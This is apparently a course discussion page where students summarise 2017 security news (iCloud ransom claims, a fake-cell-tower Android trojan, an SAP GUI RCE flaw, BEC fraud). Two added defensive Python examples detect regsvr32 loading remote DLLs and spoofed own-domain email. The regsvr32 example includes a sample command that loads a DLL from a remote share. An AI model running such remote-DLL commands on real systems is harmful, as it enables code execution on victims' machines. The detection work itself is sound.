MIS 5214 - Section 001 - David Lanter
March 22, 2017 by David Lanter 63 Comments
Binu Anna Eapen says
March 22, 2017 at 12:31 pm
Apple Devices: 300 million iCloud accounts at risk
The report states that a group of hackers named Turkish Crime Family have claimed that they have access to over 300 million iCloud accounts and are threatening to remotely wipe data from millions of Apple devices unless Apple pays them $75000 in crypto-currency (Bitcoin or Ethereum) or $100000 worth of iTunes gift cards.
While the claims are still not really confirmed, the hackers have given Apple the deadline of April 7th to pay the ransom.
The article goes on to suggest what an iCloud account holder can do to protect their account from hackers. If the hackers really do have access to iCloud accounts, they can easily access photos and private data. iCloud accounts were also hacked in the past, referring to the incident in 2014 which led to the Fappening, wherein hackers flooded the internet with nude photos of hundreds of celebrities, which were stored in their iCloud accounts. To prevent it, users are advised to reset their password immediately and enable two-step authentication to add an extra layer of security to their account.
Younes Khantouri says
March 26, 2017 at 4:57 pm
Apple has been a good company that makes the best products in my opinion. I think they have to develop themselves and invest in research to increase their products' security levels. I believe that we give our information to so many companies, they can be hacked from one of these companies at any time. Indeed, these companies have to work harder to secure our information.
Noah J Berson says
March 26, 2017 at 11:40 pm
These cloud accounts are often treated as a bank vault by consumers. In reality, they are like mailboxes sitting on the street; locked but accessible to the public. You should assume that anything you put on the cloud can be lost or stolen like how the mail service loses packages from time to time. With a heavier investment, Apple should make it harder for hackers to break in without insider knowledge.
Khawlah Abdulaziz Alswailem says
March 22, 2017 at 3:36 pm
Brain-Inspired System Aims to Improve Threat Detection
A new “brain-inspired” computer system promises improved detection of cyber threats by looking for specific patterns that can more efficiently reveal indicators of compromise in a network.
The system aims to address the limitation current systems have when it comes to the detection of more complex indicators of compromise, which the researchers call “new species of ‘bad apples’.”
The designers of the system explain that many modern cybersecurity systems might be looking for general indicators of compromise or only for specific patterns, and often require interaction with security analysts to correctly sort the real dangers from false alarms.
While conventional detection systems compare the received data against a library of malicious patterns, the Neuromorphic Cyber Microscope was designed to compare streaming data to suspicious patterns in a time-dependent manner, which should improve its detection efficiency.
March 26, 2017 at 11:45 pm
Heuristic scanning relies on past knowledge. This new method seems to get ahead of the curve, which is what is needed nowadays with how many possible attackers there are. A trained admin can sometimes tell that something is wrong with a computer before anti-virus even says anything. By using neural networking to learn what threatens a system (assuming that's what they have created), these creators made something very unique.
Said Ouedraogo says
March 22, 2017 at 4:27 pm
Breaking Down Barriers to Information Security Progress
Organizations face many barriers when it comes to running an information security program. Some are quite obvious, such as lack of budget and minimal buy-in. However, the biggest barriers come from inside the organization, as:
• Individuals inside the organization have a specific agenda, which is often to prevent security initiatives from being pushed through.
• Users are accustomed to the culture of, “Management says that security is IT’s problem, therefore it’s not mine to worry about.”
• Security product vendors overpromise and underdeliver, perpetuating security risks.
• IT and security staff waste precious time on trivial tasks.
Barriers such as these get in the way of achieving results in security.
One solution is to open the issue with management and then proceed asking the tough questions. These questions might include:
• What’s going on here?
• How is it impacting the business?
• Why do we think this is happening?
• What is currently being done to address the issue?
• What’s required to take the bull by the horns and get this initiative/project on the right track?
• How do we ensure steps are being made in the right direction? When do we do that?
Fred Zajac says
March 26, 2017 at 4:39 pm
Good article. Security is a burden on the business. It makes things more difficult, and loses money through the expense and loss of revenue. Many times an organization will only react to a security breach, and even after the breach is fixed, some will still be reluctant to invest in security, because they feel fixing the issue is going to stop it from happening again.
It’s like this: You decided to wear tennis shoes for a basketball game and fractured your ankle. The doctor puts you in a cast for six weeks, and you fully recover. You continue to wear tennis shoes, rather than basketball shoes, because you believe the cast will prevent you from fracturing your ankle again. How about we get basketball shoes? Yes, they may be uncomfortable and cost more, but what good is it if you are in a cast for another 6 weeks?
Ming Hu says
March 26, 2017 at 6:44 pm
Great post Said. I believe the reason security is so burdensome for the organization is that security vulnerabilities may come from every corner, such as a low-level employee or an inconspicuous mistake, while outside hackers are extremely sophisticated and quick to exploit these vulnerabilities to carry out a hack which may cause disastrous loss. So in order to secure their information and information systems, close attention should be paid to more aspects and each detail should be well-controlled, which is a huge expense for the organization.
Mengting Li says
March 22, 2017 at 5:55 pm
Google Hands Over Email Encryption App to Community
The technology giant first announced its end-to-end e-mail encryption project in June 2014 and released its source code in a few months. The goal is to create a Chrome extension that allows less-skilled users to use the OpenPGP standard to encrypt their e-mail.
End-to-end encryption libraries have been used for multiple projects, including E2EMail, a Gmail client that runs independently of the normal Gmail interface, allowing users to send and receive encrypted e-mail.
Over the past year, E2EMail’s source code has been provided on GitHub and has received contributions from several security engineers. The search giant has now announced that E2EMail is not a Google product, but rather a “completely community-driven open source project.”
“The current E2EMail is tested using a bare metal central key server, but recent key transparency announcements are critical to its further development,” Google employees said in a blog post. “Key discovery and distribution is at the heart of the usability challenge that OpenPGP implementation faces. Key Transparency provides a solid, scalable, and practical solution that replaces the problematic trusted web page model that traditionally works with PGP.”
March 26, 2017 at 11:50 pm
Email was designed rather early on as far as the internet goes so safety and privacy weren’t in the design specifications. Email has to travel over many different 3rd party connections (relative to the sender and receiver). Some services that attempted to create a more secure email, like Lavabit, have been shut down for being too secure. I think Google won’t get into trouble here since they are one of the largest companies in the world.
Seunghyun (Daniel) Min says
March 23, 2017 at 12:40 pm
Hackers Using Fake Cellphone Towers to Spread Android Banking Trojan
I have found an interesting article in which hackers have found a more sophisticated and deceptive way to spread malware. Chinese hackers have taken SMiShing attacks to the next level, using fake cell phone towers to distribute Android banking malware via spoofed SMS messages. (SMiShing – phishing attacks sent via SMS) Security researchers at Check Point Software Technologies have announced that Chinese hackers are using fake base transceiver stations (BTS towers) to distribute the “Swearing Trojan.” This is the first ever reported real-world case in which attackers played smart in such a way that they used BTS – a piece of equipment usually installed on cellular telephone towers. Once the malware is installed on victims’ devices, the Swearing malware distributes itself by sending phishing SMSes to a victim’s contacts. Although the maximum range of a BTS antenna may be as low as 10-22 miles, the technique is very successful and sophisticated in targeted attacks. More interesting about the Swearing malware is that, to avoid any malicious activity detection, the Swearing trojan doesn’t connect to any remote command-and-control (C&C) server. Instead, it uses SMS or emails to send stolen data back to the hackers. Check Point researchers are also warning people outside of China because they won’t be free from this attack once adopted by western malware.
Yulun Song says
March 26, 2017 at 4:03 pm
Nice post Daniel. This article illustrated that there is an increasing number of new ways or new technologies of cyber attacks. With this, companies should increase cyber security level to protect its data and sensitive information. For IT auditors, they should not only repeat old reports, but need to establish more controls for new challenges.
Zhengshu Wu says
April 9, 2017 at 4:42 pm
Cellphones should not blindly trust anything that appears as a cell tower. Why isn’t there an authentication layer? One possible setup is to mimic the TLS client-certificate system. Trusted carriers could provide SIM manufacturers the public keys of their cell towers. The phones would only connect to the matching towers.
Mustafa Aydin says
March 23, 2017 at 4:20 pm
More than 70 Percent of Mobile Devices on the Five Major US Carriers Highly Susceptible to Breach
An analysis by Skycure of the patch updates among the five leading wireless carriers in the United States found that 71 percent of mobile devices still run on security patches more than two months old.
The company’s Mobile Threat Intelligence Report also found that six percent of devices run patches that are six or more months old. Without the most updated patches, these devices are susceptible to a myriad of attacks, including rapidly rising network attacks and new malware, also detailed in the report. Boston topped a list of tech cities with the largest growth in network incidents with a more than 960 percent increase. The report also found that common malware grew by more than 500% from the first quarter to the fourth quarter of 2016.
According to the report:
• The most recent security patch released by Google has only been adopted by a very small percentage of the devices. Skycure reported that AT&T users were up to ten times more likely to have this latest patch installed.
• Among the five major US carriers, MetroPCS had the highest percentage of devices with patches more than three months old, making their devices the most susceptible to attack.
• Stand-alone protection above and beyond the integrated protections with the EMM
• Among all the major carriers, more than one-third of devices had patches more than three months old. Google releases Android security patches every month, meaning these devices are at least three patches behind, exposing vulnerabilities on these devices ripe for hackers.
The report found:
• The volume of incidents rose dramatically from the first quarter to the fourth quarter of 2016, ending Q4 with more than three times the number of incidents of Q1.
• Boston had the greatest increase in incidents throughout the year, reaching nearly 11 times the number of incidents from the first to fourth quarter, followed by Chicago, Raleigh-Durham, and Washington DC.
The Skycure report details and defines the most common types of malware, and found:
• The most common types of malware are: adware, hidden apps, potentially unwanted apps, riskware, spyware, and trojans.
• The number of these common types of malware grew by more than 500% from Q1 to Q4 of 2016.
• Among the common types of malware, hidden apps ended the year with the fastest growth in 2016.
March 26, 2017 at 5:09 pm
I like your post.
Your article pointed out an important thought about how so many companies that sell us services and products don’t care about our information security. Indeed, these companies should work harder to ensure that their clients' information is secured.
Mansi Paun says
March 24, 2017 at 12:10 am
Unpatched SAP GUI exposes systems to malware attacks due to RCE vulnerability
ERPScan security researchers warn that the SAP GUI (Graphical User Interface) exposes unpatched systems to malware attacks such as ransomware due to a remote code execution (RCE) vulnerability.
SAP was informed of the flaw in December 2016, when the flaw was discovered; however, a fix was released only as part of SAP’s March 2017 security updates. The flaw was found in SAP GUI for Windows 7.20 to 7.50, and was assessed with a High severity rating, having a CVSS (Common Vulnerability Scoring System) Base Score of 8.0.
The SAP GUI offers remote access to the SAP central server in a company network. An attacker would have to use special ABAP code to exploit the vulnerability and bypass SAP GUI security policy to execute the code.
As per ERPScan, the vulnerability could allow access to arbitrary files and directories located in an SAP-server filesystem, including an application’s source code, configuration, and critical system files. Attackers could use the bug to obtain critical technical and business-related information stored in a vulnerable SAP-system.
The security researchers explained that regsvr32.exe can be used to load DLL files from a remote SMB share and execute the DllMain function. It has also been revealed that SAP GUI has a rule which allows reading, writing, and executing of the regsvr32.exe Windows application without the security prompt, ERPScan explains. By exploiting this vulnerability, an attacker can force all the SAP GUI clients within a company to automatically download malware that locks workstations and demands money in exchange for regaining control of their systems.
An attacker can create a malicious transaction and then simply compromise the SAP Server to put the transaction into autoloading.
“Each time a user logins to the infected SAP server using SAP GUI, the malicious transaction will be executed calling a program on an endpoint that downloads the ransomware. Next time a user tries to run an SAP GUI application, the malicious transaction will be executed and prevent from logging on SAP Server. Once an attacker manages to compromise a system, however, they can execute any command remotely (the command is running with the privileges of the service that executed the command). This means that an attack where a ransom is demanded in exchange of regaining access to the affected systems is only one of the possible scenarios the flaw can abused in. Ransomware, however, remains one of the easiest ways to mass exploit the bug for financial gain.
Affected customers are advised to apply the released patch as soon as possible on each and every PC on the network, as well as implementing a vulnerability management process to continuously monitor, identify, evaluate, and mitigate vulnerabilities.
Source : http://www.securityweek.com/sap-vulnerability-exposes-enterprises-ransomware-other-attacks
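A defender-side check for the behaviour described in the post above, added here as an example that is not part of the original post or of ERPScan's material: it flags process-creation events in which regsvr32.exe is pointed at a DLL on a UNC (SMB) path, and raises the severity when the parent is an SAP GUI process. The Sysmon-style field names (Image, CommandLine, ParentImage), the SAP GUI parent process names, and the sample events are assumptions constructed for illustration.

```python
import ntpath
import re

# Assumption: executable names of the SAP GUI for Windows front end.
SAP_GUI_PARENTS = {"saplogon.exe", "sapgui.exe"}

# An argument that starts with \\host\share\... (or //host/share/...).
UNC_ARG = re.compile(r'^(?:\\\\|//)[^\\/\s]+[\\/]\S+')


def split_args(command_line):
    """Split a Windows command line into arguments, honouring double quotes."""
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', command_line)]


def unc_targets(command_line):
    """Return the arguments (after the program name) that are UNC paths."""
    return [arg for arg in split_args(command_line)[1:] if UNC_ARG.match(arg)]


def triage(event):
    """Return a finding dict for a suspicious event, or None if it is benign.

    Only regsvr32.exe launched with a UNC path argument is flagged. A drive
    letter mapped to a share cannot be recognised from the command line alone.
    """
    image = ntpath.basename(event.get("Image", "")).lower()
    if image != "regsvr32.exe":
        return None
    targets = unc_targets(event.get("CommandLine", ""))
    if not targets:
        return None
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    severity = "high" if parent in SAP_GUI_PARENTS else "medium"
    return {"severity": severity, "parent": parent, "targets": targets}


def scan(events):
    """Triage every event and keep the findings, tagged with the event index."""
    findings = []
    for index, event in enumerate(events):
        finding = triage(event)
        if finding is not None:
            finding["index"] = index
            findings.append(finding)
    return findings


# Constructed sample events (not taken from any real system).
SAMPLE_EVENTS = [
    {   # SAP GUI spawning regsvr32 against a remote share: the pattern in the post
        "ParentImage": r"C:\Program Files (x86)\SAP\FrontEnd\SAPgui\saplogon.exe",
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "CommandLine": r"regsvr32.exe /s \\203.0.113.10\pub\x.dll",
    },
    {   # Ordinary local registration by an installer: benign
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\plugin.dll"',
    },
    {   # Remote DLL, quoted path with a space, non-SAP parent: still worth a look
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
        "CommandLine": r'C:\Windows\SysWOW64\regsvr32.exe /s "\\nas01\tools\my lib.dll"',
    },
    {   # SAP GUI starting something else entirely: out of scope for this rule
        "ParentImage": r"C:\Program Files (x86)\SAP\FrontEnd\SAPgui\saplogon.exe",
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": r"notepad.exe C:\Users\a\notes.txt",
    },
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["index"], finding["severity"], finding["parent"], finding["targets"])
```
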
Paul Linkchorst says
March 24, 2017 at 8:56 am
eBay Asks Users to Downgrade Security
According to the article found on KrebsOnSecurity, there has been a recent change to how eBay handles multi-factor authentication. Prior to the recent change, eBay offered an out-of-band token that generated a unique six-digit code which expires every thirty seconds to log into the account. However, eBay is now encouraging individuals to switch to utilizing SMS-based two-factor authentication. The reasoning for the switch is cited to be that eBay is trying to improve upon their multi-factor authentication program and bring it in-house as opposed to likely utilizing a third-party software as an authentication service.
This is an interesting switch in how security is being approached. On one end, utilizing SMS-based two-factor authentication can provide 2 layers of security if the cellphone/smartphone receiving the SMS is password protected. This is mostly achieved by biometrics and passcode locks on a smartphone. However, on the other end, SMS-based two-factor authentication is more susceptible to being intercepted either through social engineering or exploiting cell-phone protocols. On top of this, according to Brian Krebs, NIST recently addressed in their Publication 800-63B that they suggest SMS two-factor authentication be phased out. It is an interesting discussion as to why to implement one form of second authentication or the other, as there can be arguments that SMS two-factor is more inviting to new users of two-factor while out-of-band two-factor is more secure. Regardless, the business decision will not appease everyone.
On a last note, Brian Krebs cites a website called twofactorauth.org. This website identifies all sorts of products or services that offer two-factor authentication. As I reviewed the website, I was appalled at just how many banks offer no two-factor authentication. As someone who is looking to switch banks, this will be a part of my consideration.
March 26, 2017 at 11:57 pm
It took a while to understand why this was a security downgrade as I didn’t first think of the ways someone could intercept your text messages. There was probably a cost factor to this decision as sending out SMS messages is cheaper than sending out physical fobs to each customer. Lately I have seen one-time password (OTP) options as apps for the phone. If someone is security-minded, they should lock their phone down as well to prevent this vulnerability. Both methods are susceptible to a stolen phone that is able to be unlocked.
April 9, 2017 at 4:47 pm
I’d like to see laptops (& desktops) get built-in fingerprint scanners, like iPhones have. You could then use your finger to log in wherever without all this nonsense. Perhaps have a password as backup in case your finger isn’t available.
Brou Marie Joelle Alexandra Adje says
March 24, 2017 at 9:17 am
The Biggest Cybersecurity Threats Are Inside Your Company
The article I read is about the real cause of cyber security in a company. In fact, the article mentioned that no matter the size or the scope of a breach, usually it’s caused by an action, or failure, of someone inside the company (according to IBM, 60% of all attacks in 2016 were carried out by insiders). The most dangerous aspect of insider threats is the fact that the access and activities are coming from trusted systems, and thus will fly below the radar of many detection technologies. Thus, managers must be aware of what to look for and how to focus their security efforts to get the greatest returns on protection. Key points to focus on are:
1. Focus on the right assets.
2. Apply deep analytics
3. Know your people
4. Don’t forget the basics
Wen Ting Lu says
March 25, 2017 at 8:54 pm
I believe the biggest threat to an organization is its employees. Research has found that 70 percent of the healthcare organizations and business associates surveyed identified employee negligence as a top threat to information security. And an article earlier this year in Federal Times noted, “Every survey of IT professionals and assessment of cybersecurity posture shows AT LEAST 50 percent of breaches and leaks are directly attributable to user error or failure to practice proper cyber hygiene.” That being said, companies should spend more effort and time on employee background checks and employee training to ensure that all the employees are aware of the importance of data security.
Joshua Tarlow says
March 26, 2017 at 4:19 pm
I’ve read that too and definitely agree that employees can be an organization's largest threat. I recently read a survey by Pew about the lack of knowledge of basic security principles for the average person. Other than identifying a strong password, most did not know other basic security practices. This lack of knowledge and awareness can be very problematic at a company.
Priya Prasad Pataskar says
March 24, 2017 at 2:46 pm
Is Encrypted data at risk too?
Kentucky-based Med Center Health issued a public notification confirming that their patient data was breached. The chain of hospitals determined that an employee had obtained critical data by making it appear that he needed it for an official task. This was done by a former employee in 2014. However, during the review in 2017 it was noticed that the employee had allegedly obtained patient information on encrypted CD and USB for his own purpose. The billing data stolen included patients’ names, addresses, Social Security numbers, health insurance information, diagnoses and procedure codes and charges for medical services. Further investigation revealed that the employee had gathered the information as he intended to use it in developing software for an outside business interest.
On March 1 reported to the U.S. Department of Health and Human Services that the breach affected 697,800 individuals and involving an unspecified “theft and reports as the largest incident added to the HHS so far in 2017.
Privacy attorney Kirk Nahra states that if the company is compliant with PCI standards the data would be encrypted and by law only unencrypted and unredacted computerized data that compromises the security, confidentiality, or integrity of personally identifiable information.
To avoid a breach of the confidential key, the decryption tools should be stored on a device or at a location separate from the data they are used to encrypt or decrypt. The individual who stole data would have had access to a decryption key or other means of accessing the encrypted data – or he stole the data before it was encrypted must be investigated.
March 26, 2017 at 3:18 pm
Interesting article that you posted. I think the most interesting part of the article was reading about HIPAA’s Breach Notification Rule. The ruling identifies that a breach is “an impermissible use or disclosure under the Privacy Rule that compromises the security or privacy of the protected health information”. Who the unauthorized personnel were, the extent and quantity of the health information involved, and whether the entirety of the health data was acquired/viewed all pertain to identifying if a leak of information is considered a breach. This makes sense since if a single patient’s medical condition was leaked to an unauthorized individual, it might be an illegal disclosure in regards to HIPAA but not a data breach.
However, there are three exclusions to the definition of a “breach”.
1. The disclosure or acquisition was made in “good faith” by a workforce member
2. The inadvertent disclosure of information from one health professional/workforce member to another health professional/workforce member.
3. If the unauthorized person was not able to retain the information, then it is not considered a breach
These three exclusions make the situation in your article quite interesting since the exposure was done by an inside employee and would have been classified as the inadvertent disclosure of information from one health professional to another. Overall I am glad that this data breach was released and those affected were notified.
Arkadiy Kantor says
March 24, 2017 at 3:47 pm
I thought this article was interesting because it focused on the social aspect of security. It talks about how most people are not aware of cyber security risks and they are not properly trained. The article suggests that we have a dangerous mindset about cyber security and it can pose a huge threat. Despite all the recent major breaches in both the private and political sectors, people have very little knowledge or self-awareness of the security implications. I think these are very good points and people are relying on technology to protect themselves from threats, which leaves us very vulnerable to social threats.
March 26, 2017 at 4:11 pm
This article is a good reminder for people. I also read a couple of similar articles before. There are still tons of companies that do not have awareness training or password integrity controls for their sensitive accounts and data areas. As in a video I watched before, people still write down their passwords on their office desk or put them on the wall, and there are many people who still use their pets' names or family members as their passwords. I think companies should really have training on these areas and create strong security awareness for their employees.
March 26, 2017 at 4:17 pm
Definitely agree that companies should increase awareness training. And some practices such as taping passwords to a desk are never accessible. However, not always realistic to expect the average person to be able to remember a different password for every application and with an adequate complexity level. Personally, not sure the industry has established a suitable alternative to passwords yet. But still not excuse for inadequate security practices
March 24, 2017 at 3:57 pm
“The Cybersecurity Industry Is Failing: Time to Get Smart About ‘Dumb’ Homes”
The article discusses the current lack of security in many connected devices and how companies producing these products have failed consumers. It notes that it is not realistic to expect all consumers to secure these devices independently or have all of the technical knowledge. The companies should play a larger role and make the devices more secure, including preemptively doing things such as changing the default password to minimize the risk for the consumer.
March 26, 2017 at 5:15 pm
My post was talking about how hackers can use our smart TVs at home to watch and listen to what we do inside our homes. I do believe that most of the companies that sell us services or products don’t work hard enough and don’t invest to secure our information and devices.
Yang Li Kang says
March 27, 2017 at 12:36 am
I think that companies may be prioritizing the security in their own company internally and either forgetting to secure their products or choosing to neglect it because it increases the cost.
Vaibhav Shukla says
March 25, 2017 at 2:14 pm
Third-Party App Store Slips Inside iOS App Store
A third-party app store application managed to slip into the official iOS App Store by masquerading as a legitimate financial helper application, according to Trend Micro researchers. The third-party store can be used to install not only applications in the official iOS App Store, but also those that are distributed via unofficial channels, thus potentially exposing users to mobile malware and other unwanted applications. One of the programs distributed via this portal is “PG Client,” a tool for jailbreaking iOS devices.
The app also uses a third-party SDK called TalkingData to gather information about the user’s behavior. The SDK has many aggressive API calls and can acquire various information about the user’s system, such as the Wi-Fi network name, running processes, and IP address. On jailbroken devices, it can also gather the user’s Apple ID and installed apps.
March 26, 2017 at 3:37 pm
From the articles I have been reading, it seems that the most common form of malware for mobile operating systems is Trojans. I would imagine that is the case since, unless an iPhone is jailbroken or an Android phone allows third-party applications on the device, the only way users will be able to download such malware will be through the official application stores. Since all mobile applications on the iOS App Store are reviewed, and I believe most Android ones are as well, this means that an attacker needs to mask their true intentions with some sort of fake functionality. I do think that we will see an increase in the amount of mobile malware attacks. Phones nowadays have all sorts of information on them, such as employer emails, bank account information, photos, and even password managers. Since the “loot” is beginning to grow on mobile devices, so will the creativity of cyber attackers in trying to get it.
March 25, 2017 at 3:32 pm
Android Forums Suffers Data Breach
The article I read this week talks about how the server hosting the website of Android Forums, one of the most popular online Android communities, has been breached, allowing attackers to access some user information.
According to representatives of Neverstill Media, which maintains Android Forums, hackers managed to access information on 2.5 percent of active users. This included one staff member and 40 users who registered accounts between 2016 and 2017. The compromised data includes email addresses, hashed passwords and salts. In addition, leading developers believe that those compromised accounts that never posted anything on Android Forums are bots.
The accessed information can be leveraged for spam and phishing campaigns. Affected users have been notified via email and instructed to change their passwords. The vulnerability exploited by the attackers has been patched and various security improvements are being made to prevent incidents in the future.
Yu Ming Keung says
March 26, 2017 at 4:08 pm
Hey Wen Ting, interesting post. Normal users of forums won’t share their sensitive information but they most likely use the same passwords for different accounts, including banks, universities, and workplaces. It is relatively easier for the hackers to obtain and steal other sensitive information by using the information stolen from the Android forum. I would strongly recommend these affected users change their passwords on other accounts.
March 26, 2017 at 6:19 pm
I definitely agree with you! Once the hacker obtains the account information on one social media platform, they will test it on the other accounts that users have because it is very likely people are re-using the same username and password for multiple accounts. People tend to use the same account information (username and password) for all the accounts they have because it is convenient and easy to remember. However, for security purposes, it’s not a very smart decision. People should use unique and strong passwords for different accounts.
Jianhui Chen says
March 26, 2017 at 8:09 pm
Good post Wenting,
This article reminds me of the article I have read, “Why a billion Android phones will never be safe”
nearly a billion phones being vulnerable to hacking, major phone makers that rely on the operating system — Samsung, Google, Sony, LG, and more — announced plans to start issuing monthly bug fixes for their phones. The news is certainly timely, but it’s not going to fix a thing. Android is the most vulnerable OS to bugs, hacks, glitches, and issues of any kind, and no update program from Samsung and LG is going to change that, regardless of what you may read.
March 25, 2017 at 11:09 pm
One of the most valued rights in America is the right to privacy. This is essential in a market economy. If we don’t allow for private property, then it is government property and called communism. We can argue what is best for its society, but Americans cherish the idea of being able to talk on the telephone without the fear of the government listening in, unless they have a warrant, which requires a good reason.
Well, things have changed since terrorist attacks have ravaged our land, and others across the world we call home. Since then, the government has been given the freedom to investigate techniques on hacking iPhones, smart appliances, and other devices that can be used to track and monitor someone. WikiLeaks released documents that showed the CIA had the capabilities to hack into people's equipment and track them without their knowledge, even if the system was wiped and re-installed.
This is freaking some people out, but isn’t it a good thing that our CIA has the capabilities to do this? The WikiLeaks report never mentioned the CIA using these technologies on anyone, but I have to say that I am glad the CIA has the tools to spy on a would-be-terrorist.
Would you be happy if the CIA identified a terrorist in Philadelphia who was plotting to kill people? Oh wait, they did… Colleen LaRose A.K.A Jihad Jane.
March 26, 2017 at 6:48 pm
Thanks for sharing the news, Fred!
I am also pleased that the CIA has the tools to investigate terror suspects. Although we have to give up some privacy when talking on the phones, people might feel uncomfortable because they are being monitored. But in general, it is worthwhile if CIA can get any suspicious behavior of terrorists.
Wenlin Zhou says
March 26, 2017 at 10:30 am
Could Killing of FCC Privacy Rules Lead to End of Net Neutrality?
The Senate on Thursday voted 50-48 to overturn new FCC rules that would prevent ISPs from monetizing customers’ information without their consent. The rules, passed during the Obama administration in October 2016, were due to come into force earlier this month, but were delayed by new Republican chairman Ajit Pai.
This delay provided time for Republican senators to propose a Joint Resolution to ‘disapprove’ the new FCC rules. S.J. Res. 34 was adopted along party lines. It ‘disapproves’ the FCC rule “Protecting the Privacy of Customers of Broadband and Other Telecommunications Services… and such rule shall have no force or effect.”
The ISPs are not happy with this, and have been complaining and lobbying to get it reversed. “The unfortunate result of the FCC’s extreme regulatory proposals,” wrote Comcast in March 2016, “will be more consumer confusion and less competition — and a bunch of collateral damage to innovation and investment along the way. This is most disappointing because it is entirely avoidable, since the Administration, the Federal Trade Commission, and others have examined this issue and marketplace for many years and have reached very different conclusions.”
In short, the FCC grabbed regulatory control of ISPs from the FTC in order to enforce net neutrality, but in doing so also became responsible for privacy. The effect was to place different internet giants (such as Comcast, Verizon and AT&T) under different regulations to others (such as Google and Facebook). The latter are allowed to monetize customer data, while the former are not.
March 26, 2017 at 12:48 pm
The article I read for this week is called “Apple Ransom Threat: Legitimacy is Elusive.” The article reports that a hacking organization identifying itself as the Turkish Crime Family has gone hunting for a very big fish: it said that it has credentials for hundreds of millions of Apple accounts of various sorts (including email and iCloud), and it is threatening to wipe all of the iPhones in the cache unless a hefty ransom is paid. This group is asking for either $75,000 in Bitcoin or $100,000 in iTunes gift cards before the April 7 deadline. It is a major shakedown, but is it legitimate? If this is legit, the hackers would have had to obtain access to the individual user accounts by breaking the passwords of each of the user accounts or have acquired access to the Apple iCloud servers, and access to each user account is much more realistic since we have seen numerous reports of all the weak passwords people use for their computers and accounts. Apple users should make sure they are using strong passwords and enabling two-factor authentication as an added protection. For bound credit card information, Apple and banks should increase their security level for safety.
March 26, 2017 at 8:12 pm
Thanks for sharing, Yulun,
Before reading this article, I never realized that the likelihood of a mass remote wipe of iPhone data is unknown, though there is reason to be skeptical. The Apple spokesperson said that Apple is “actively monitoring to prevent unauthorized access to user accounts and are working with law enforcement to identify the criminals involved. To protect against these type of attacks, we always recommend that users always use strong passwords, not use those same passwords across sites and turn on two-factor authentication.”
Deepali Kochhar says
March 26, 2017 at 1:47 pm
BEC Soars Again as Fraudsters Target Employees
Business Email Compromise (BEC) attacks jumped 45% in the final quarter of 2016, compared to the previous three months. These attacks have grown both in volume and sophistication. Also known as “CEO fraud” and “whaling”, these attacks typically involve fraudsters spoofing the email addresses of company CEOs to trick staff members into transferring funds outside the company. Some of them also include attempts to target HR teams for confidential tax information and sensitive employee data, as well as engineering departments which may have access to a wealth of lucrative corporate IP.
In its analysis of over 5000 global enterprise customers, it claimed that in two-thirds of cases the attacker spoofed the “from” email domain to display the same as that of the targeted company. These attacks are a combination of this domain spoofing and social engineering of the victim to force them to pay up.
It is claimed that firms in the manufacturing, retail and technology sectors are especially at risk, as cyber-criminals repeatedly look to take advantage of more complex supply chains and SaaS infrastructures.
When it comes to BEC attacks, employees should never be an organization’s first line of defense. It is the organization’s responsibility to ensure that security technologies are in place, so that BEC attacks are stopped before they can reach their intended target.
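The kind of gateway control the post above calls for, as an added example that is not part of the original comment: an inbound-mail check that quarantines messages whose "From" domain is the organisation's own but which did not pass DMARC. The domain `example.com`, the gateway name `mx.example.com` and the sample messages are constructed assumptions, and the check assumes it only sees mail arriving from outside.

```python
import re
from email import message_from_string
from email.utils import parseaddr

ORG_DOMAIN = "example.com"          # assumption: the protected company's domain
TRUSTED_AUTHSERV = "mx.example.com"  # assumption: our own gateway's authserv-id


def header_domain(value):
    """Return the lower-cased domain of the address in a From/Reply-To header."""
    address = parseaddr(value or "")[1]
    return address.rpartition("@")[2].lower()


def trusted_auth_results(msg, authserv=TRUSTED_AUTHSERV):
    """Read spf/dkim/dmarc verdicts, but only from headers stamped by our gateway.

    An Authentication-Results header carrying any other authserv-id may have
    been written by the sender and is ignored.
    """
    verdicts = {}
    for value in msg.get_all("Authentication-Results", []):
        ident, _, rest = value.partition(";")
        tokens = ident.split()
        if not tokens or tokens[0].lower() != authserv:
            continue
        for method, result in re.findall(r"\b(spf|dkim|dmarc)=(\w+)", rest, re.I):
            verdicts[method.lower()] = result.lower()
    return verdicts


def classify(raw, org_domain=ORG_DOMAIN):
    """Return (action, reasons) for one inbound message from outside."""
    msg = message_from_string(raw)
    from_dom = header_domain(msg.get("From"))
    reply_dom = header_domain(msg.get("Reply-To"))
    auth = trusted_auth_results(msg)
    reasons = []
    ours = from_dom == org_domain or from_dom.endswith("." + org_domain)
    if ours and auth.get("dmarc") != "pass":
        reasons.append("own-domain-in-from-without-dmarc-pass")
    if reply_dom and reply_dom != from_dom:
        reasons.append("reply-to-domain-differs-from-from")
    if "own-domain-in-from-without-dmarc-pass" in reasons:
        return "quarantine", reasons
    return ("flag" if reasons else "deliver"), reasons


# Constructed sample messages (not real traffic).
SAMPLES = {
    "spoofed_ceo": "\n".join([
        "Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=example.com;"
        " dmarc=fail header.from=example.com",
        'From: "Chief Executive" <ceo@example.com>',
        "Reply-To: <ceo@example.net>",
        "To: accounts@example.com",
        "Subject: Urgent transfer",
        "",
        "Please process this payment today.",
    ]),
    "genuine_vendor": "\n".join([
        "Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=example.org;"
        " dkim=pass header.d=example.org; dmarc=pass header.from=example.org",
        "From: Billing <billing@example.org>",
        "To: accounts@example.com",
        "Subject: Invoice 1001",
        "",
        "Invoice attached.",
    ]),
    "forged_auth_header": "\n".join([
        "Authentication-Results: mail.sender.invalid; dmarc=pass header.from=example.com",
        "From: HR <hr@example.com>",
        "To: staff@example.com",
        "Subject: Tax forms",
        "",
        "Send the forms to me.",
    ]),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, classify(raw))
```

The third sample shows why only the gateway's own Authentication-Results header is trusted: a header supplied by the sender claims a DMARC pass, and the message is still quarantined.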
March 26, 2017 at 4:02 pm
Vulnerabilities Found in Popular Solar Park Monitoring System
